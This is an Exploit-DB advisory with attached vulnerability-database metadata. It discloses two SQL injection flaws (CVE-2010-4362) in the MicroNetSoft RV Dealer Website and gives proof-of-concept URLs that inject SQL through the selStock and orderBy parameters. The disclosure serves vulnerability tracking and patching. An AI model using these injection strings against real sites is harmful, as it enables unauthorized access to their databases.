ID EDB-ID:15629
Type exploitdb
Reporter underground-stockholm.com
Modified 2010-11-29T00:00:00
Description
MicroNetSoft RV Dealer Website search.asp & showAlllistings.asp - SQL Injection. CVE-2010-4362. Webapps exploit for asp platform
TITLE: MicroNetSoft RV Dealer Website Two SQL Injection Vulnerabilities
PRODUCT: MicroNetSoft RV Dealer Website
PRODUCT URL: http://www.micronetsoft.com/store/scripts/prodView.asp?idproduct=77
RESEARCHERS: underground-stockholm.com
RESEARCHERS URL: http://underground-stockholm.com/
SQL INJECTION BUGS:
http://[host]/[path]/search.asp?selStock=x%27%20union%20selecta
http://[host]/[path]/showAlllistings.asp?orderBy=union
{"published": "2010-11-29T00:00:00", "id": "EDB-ID:15629", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "2965e04eacb8bde33e5b23df121ed7a6eed61065b80cc94ec12bf849907a0c3f", "description": "MicroNetSoft RV Dealer Website search.asp & showAlllistings.asp - SQL Injection. CVE-2010-4362. Webapps exploit for asp platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/15629/", "lastseen": "2016-02-01T22:12:55", "edition": 1, "title": "MicroNetSoft RV Dealer Website search.asp & showAlllistings.asp - SQL Injection", "osvdbidlist": ["69581", "69580"], "modified": "2010-11-29T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": ["CVE-2010-4362"], "sourceHref": "https://www.exploit-db.com/download/15629/", "references": [], "reporter": "underground-stockholm.com", "sourceData": "TITLE: MicroNetSoft RV Dealer Website Two SQL Injection Vulnerabilities\r\nPRODUCT: MicroNetSoft RV Dealer Website\r\nPRODUCT URL: http://www.micronetsoft.com/store/scripts/prodView.asp?idproduct=77\r\nRESEARCHERS: underground-stockholm.com\r\nRESEARCHERS URL: http://underground-stockholm.com/\r\n\r\nSQL INJECTION BUGS:\r\n\r\nhttp://[host]/[path]/search.asp?selStock=x%27%20union%20selecta\r\nhttp://[host]/[path]/showAlllistings.asp?orderBy=union\r\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2010-4362", "type": "cve", "title": "CVE-2010-4362", "description": "Multiple SQL injection vulnerabilities in MicroNetsoft RV Dealer Website allow remote attackers to execute arbitrary SQL commands via the (1) selStock parameter to search.asp and the (2) orderBy parameter to showAlllistings.asp.", "published": "2010-12-01T11:06:13", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4362", "cvelist": ["CVE-2010-4362"], "lastseen": "2016-09-03T14:34:35"}]}}